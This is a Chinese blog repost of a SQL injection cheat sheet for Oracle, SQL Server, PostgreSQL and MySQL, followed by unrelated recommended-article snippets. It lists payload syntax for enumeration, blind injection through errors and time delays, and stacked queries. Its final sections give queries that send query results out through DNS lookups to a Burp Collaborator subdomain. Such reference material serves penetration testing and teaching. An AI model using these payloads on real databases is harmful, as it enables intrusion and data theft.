microsoft query sql引用单元格_SQL注入备忘录拓展

最新推荐文章于 2021-06-30 11:03:37 发布
最新推荐文章于 2021-06-30 11:03:37 发布
阅读量198 收藏
点赞数
文章标签: microsoft query sql引用单元格
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39822728/article/details/111709690
版权
这篇备忘录介绍了如何利用SQL注入技术,包括字符串串联、注释使用、查询数据库信息、条件错误检查、批处理查询、时间延迟以及通过DNS查询进行数据渗透。这些方法在对数据库进行恶意操作时常见,例如通过布尔盲注和时间盲注来探测和利用漏洞。
摘要由CSDN通过智能技术生成

    该SQL注入备忘录包含有用的语法示例,您可以使用这些语法来执行SQL注入攻击时经常出现的各种任务。

cd6a8839e8f8b5f901e442e4f87834ea.png

String concatenation 字符串串联

您可以将多个字符串连接在一起以组成一个字符串。

Oracle'foo'||'bar'
Microsoft'foo'+'bar'
PostgreSQL'foo'||'bar'
MySQL'foo' 'bar' [Note the space between the two strings]
CONCAT('foo','bar')

Comments 注释

您可以使用注释来截断查询并删除输入之后的原始查询部分。

Oracle--comment
Microsoft--comment
/*comment*/
PostgreSQL--comment
/*comment*/
MySQL#comment
-- comment [Note the space after the double dash]
/*comment*/

Database version 数据库类型和版本

您可以查询数据库以确定其类型和版本。在制定更复杂的攻击时,此信息很有用。

OracleSELECT banner FROM v$version
SELECT version FROM v$instance
MicrosoftSELECT @@version
PostgreSQLSELECT version()
MySQLSELECT @@version

Database contents 数据库内容

您可以列出数据库中存在的表以及这些表包含的列。

OracleSELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
MicrosoftSELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQLSELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
MySQLSELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

Conditional errors 条件错误

您可以测试单个boolean(布尔)条件,如果条件为true,则触发数据库错误。

OracleSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual
MicrosoftSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
PostgreSQLSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END
MySQLSELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')

Batched (or stacked) queries 批处理(或堆叠)查询

您可以使用批处理查询来连续执行多个查询。请注意,在执行后续查询时,结果不会返回给应用程序。因此,该技术主要用于与盲目的漏洞有关的问题,在该漏洞中,您可以使用第二个查询来触发DNS查找,条件错误或时间延迟。

OracleDoes not support batched queries.
MicrosoftQUERY-1-HERE; QUERY-2-HERE
PostgreSQLQUERY-1-HERE; QUERY-2-HERE
MySQLDoes not support batched queries.

Time delays 时间延迟

处理查询时,可能导致数据库中的时间延迟。以下情况将导致10秒的无条件时间延迟。

Oracledbms_pipe.receive_message(('a'),10)
MicrosoftWAITFOR DELAY '0:0:10'
PostgreSQLSELECT pg_sleep(10)
MySQLSELECT sleep(10)

Conditional time delays 有条件的时间延迟

您可以测试单个布尔条件,并在条件为真时触发时间延迟。

OracleSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
MicrosoftIF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
PostgreSQLSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
MySQLSELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')

DNS lookup DNS查询

您可以使数据库对外部域执行DNS查找。为此,您将需要使用Burp客户端生成将在攻击中使用的唯一Burp Collaborator子域,然后轮询Collaborator服务器以确认是否发生了DNS查找。

Oracle以下技术利用XML外部实体(XXE)漏洞来触发DNS查找。该漏洞已得到修补,但是存在许多未修补的Oracle安装:
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?> %remote;]>'),'/l') FROM dual
以下技术适用于完整Oracle安装,权限的提升:
SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')
Microsoftexec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'
PostgreSQLcopy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'
MySQL以下技术仅适用于Windows:
LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')
SELECT ... INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'

DNS lookup with data exfiltration DNS查找与数据渗透

您可以使数据库对包含注入查询结果的外部域执行DNS查找。为此,您将需要使用Burp Collaborator客户端生成将在攻击中使用的唯一Burp Collaborator子域,然后轮询Collaborator服务器以检索任何DNS交互的详细信息,包括被泄露的数据。

OracleSELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?> %remote;]>'),'/l') FROM dual
Microsoftdeclare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a"')
PostgreSQLcreate OR replace function f() returns void as $$
declare c text;
declare p text;
begin
SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();
MySQL以下技术仅适用于Windows:
SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'
weixin_39822728
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL操作符之(and、or、in、not)
Java框架、并发编程、分布式、微服务、Redis、HarmonyOS、中间件等技术
11-11 2764
备战2022春招或暑期实习,本专栏会持续输出MySQL系列文章,祝大家每天进步亿点点!文末私信作者,我们一起去大厂。 本篇总结的是 《where使用》,后续会每日更新~ 关于《Redis入门到精通》、《并发编程》、《Java全面入门》、《鸿蒙开发》等知识点可以参考我的往期博客 相信自己,越活越坚强,活着就该逢山开路,遇水架桥!生活,你给我压力,我还你奇迹! 目录 1、简介 2、正文 2.1 and操作符 2.2 or操作符 2.3 in操作符 2.4 not操作符 2.5 操作符
pythonpandas用sql查询数据表_python pandas read_sql_query使用记录
weixin_39972567的博客
02-03 958
版本: 系统win 10 ,python 3.5, pandas:0.25.0解决问题:读取到的数据为 科学计数法,然后转换成整数影响精度.pandas 使用 read_sql_query:pandas.read_sql_query(sql, con, index_col=None, coerce_float=True, params=None, parse_dates=None, chunksi...
mysql not in 和 != 的问题
一头老母猪的博客
12-24 2618
mysql not in 的问题 SELECT d.*, t.* FROM febs_cloud_base.t_dept d LEFT JOIN acme_dept_type t ON t.dept_id = d.DEPT_ID WHERE PARENT_ID = '125' AND t.management_type NOT IN ('JYGL', 'JYQH') not in 是对连表之后的 每一个 management_type进行 != 比较 sql里 任意!...
mysql not in性能分析_Sql中的in和与not in, exists与not exists区别和性能分析
weixin_42519514的博客
01-27 1090
Sql中的in和与not in, exists与not exists区别和性能分析1、in和existsin把外表和内标作Hash连接exists对外表作loop循环,每次loop循环再对内表进行查询使用:两张表大小相当。用in和exists差别不大两张表一大一小(相对而言),子查询大表,用exists;子查询小表,用in;例如:A小表,B大表select * from A where col i...
mysql not_MySQL--数据过滤(AND、OR、IN、NOT操作符)
weixin_29360387的博客
01-18 3051
MySQL允许给出多个WHERE子句。这些子句可以两种方式使用:以AND子句的方式或OR子句的方式使用。1、组合WHERE子句1.1 AND操作符SELECTprod_id,prod_price,prod_nameFROMproductsWHERE vend_id=1003 AND prod_price<=10;此SQL语句检索由供应商1003制造且价格小于等于10美元的所有产品的名称和价格...
mysql and or not
crisis111的专栏
05-20 435
select   *   from   table   where   Condition1   and   Condition2   or   Condition3 执行顺序为:select   *   from   table   where   (Condition1   and   Condition2)   or   Condition3  先执行and搜索,在执行or过滤
php is_numberic函数造成的SQL注入漏洞
01-21
一、is_numberic函数简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric (mixed $var)如果 ... //是 values($s) 不是values(‘$s’)mysql_query($sql);上面这个片段程序是判
jsp.rar_jsp sql_同学录
09-24
【标签】"jsp_sql 同学录"进一步强调了项目的关键技术栈,即JSP和SQL的结合,以及项目的核心应用领域——同学录。这表明开发者在实现该项目时,不仅需要熟练掌握JSP的脚本编写和页面控制,还需要有扎实的SQL基础,...
SQL SERVER python.rar_python SQL Server_python sql server_pytho
09-21
df = pd.read_sql_query(sql_query, cnxn) ``` 最后,别忘了在完成数据库操作后关闭连接: ```python cursor.close() cnxn.close() ``` 这便是Python连接SQL Server的基本流程。通过这个过程,你可以执行复杂的...
SQLQuery1_实验7.sql
最新发布
05-13
SQLQuery1_实验7.sql
SQL语句的in 和 =,not in 和 !=,not in和获取当前时间及时间戳
Green
06-30 1284
1.in 和 =,not in 和 !=,not in 后面接子查询的时候: not in和in后面接的子查询的结果是一组集合 !=和=后面接的子查询的结果是一个值 not in是说明前面的不包含在后面子查询的集合里 //查询id是1的数据 select * from table_name where id = '1' //查询id是1,2,3点数据 select * from table_name where id in ('1','2','3') 2.获取当前时间及时间戳 获取当.
!=和notin哪个快_快起来吧!
cusi77914的博客
06-30 735
一个想法就像痒:您需要抓挠它,当您这样做时会感觉更好。 作为软件开发人员,我们花费大量时间思考各种应用程序的想法。 很好玩吧? 面临的挑战是弄清楚如何使软件产品实现。 想像一下然后创建它就很令人满意。 另一种选择(痒痒)只是令人沮丧。 许多应用程序从未落地的原因之一就是对基础架构的需求。 维护良好的基础结构通常需要系统管理员,DBA和网络工程师组成的团队,这些团队直到最近才是主要针对富人的...
mysql not in优化_SQL 语句 NOT IN 和 != 如何优化?
weixin_34226837的博客
01-18 669
这条 sql 语句查询的是同一张表,但是带有 not in 和 != 索引用不上,如何优化?SELECT * FROM filemail.bottles WHERE id NOT IN(8,7) AND userid != 34790331 AND show_times <= 10 AND status = 1 ORDER BY reply_rate DESC, reward DESC表结构...
mysql and not exists_MySQL ------ 过滤数据 and、or、in、exists、not(七)
weixin_34873798的博客
01-18 2360
更强的过滤控制:and 子句方式和 or 子句方式操作符(operator)用来联结或改变where 字句中的字句的关键字。也成逻辑操作符(logical operator)1、AND操作符:通过不止一个条件进行过滤where 与and 连用可以不止通过一个列进行过滤,将两个过滤条件组合在一起,用来检索满足所给定条件的行,两个条件后增加一个条件就要加一个and用到的表--将供应商是 1003 价格...
mysql and not_MySQL查询与AND,OR和NOT
weixin_29901323的博客
01-18 1066
Lets say I have a table of articles with as many to many relationship with topics. Each topic assigned to an article has a type field which can contain 1 of 3 values AND, NOT, and OR.Articlesid....Top...
Java教程之SQL性能优化提升
想当大佬的咸鱼双的博客
07-19 1518
Ø 简单的性能优化   Sql的性能优化是数据库工程师在实际工作中必须面对的重要课题之一。对于某些数据库工程师来说,它几乎唯一的命题。实际上,像WEB服务这样需要快速响应的应用场景中,SQL的性能直接决定了系统是否可以使用。这里主要介绍一些使用SQL执行速度更快,消耗内存更少的优化技巧,今天的文章只介绍其中的一种,后续会继续更新一些其它的优化方式。   严格地优化查询性能时,必须要了解所使用的...
SQL查询性能分析之(not in)、(and not)、()、(!=)性能比较
weixin_33800593的博客
03-22 713
  SQL查询性能分析之(not in)、(and not)、()、(!=)性能比较 SQL Server Bruce 3年前 (2013-01-08) 3284浏览 0评论 &lt;:article class="article-content"&gt; 在与朋友讨论查询时引出了not in 与and not两种踢出方法,相互的口舌之争之后我决定动手来查查看,他...
and or not 优先级_MySQL --- AND、OR、IN、NOT检索数据(六)
weixin_39687990的博客
11-26 750
更强的过滤控制:and 子句方式和 or 子句方式操作符(operator):用来联结或改变where 字句中的字句的关键字。也成逻辑操作符(logical operator)1、AND操作符:通过不止一个条件进行过滤where 与and 连用可以不止通过一个列进行过滤,将两个过滤条件组合在一起,用来检索满足所给定条件的行,两个条件后增加一个条件就要加一个and用到的表-- 将供应商是 1003 ...
mysql in any all_详解mysql子查询(in,not in,any,!=any,all,!=all,some)等实例
weixin_33615688的博客
01-19 827
在工作和学习中,我们经常使用到mysql子查询in,not in还有不常用的any,!=any,all,!=all,some等。今天刚好整理一下mysql子查询,便于后面查阅。一、可以按照mysql子查询的类型划分。1)、按照使用结构。where子查询from子查询exists子查询2)、按照返回结果。标量子查询列子查询行子查询表子查询下面我们就按照返回结果的顺序讲解mysql子查询。1、标量子查...
WordPress 5.8.3 核心函数WP_Query SQL注入分析
本文讨论的是WordPress中的一个SQL注入漏洞,该漏洞编号为CVE-2022-21661,主要涉及WordPress的核心函数WP_Query。这个函数在很多插件中广泛使用,因此漏洞的存在可能导致广泛的潜在风险。尽管该漏洞不是直接可利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值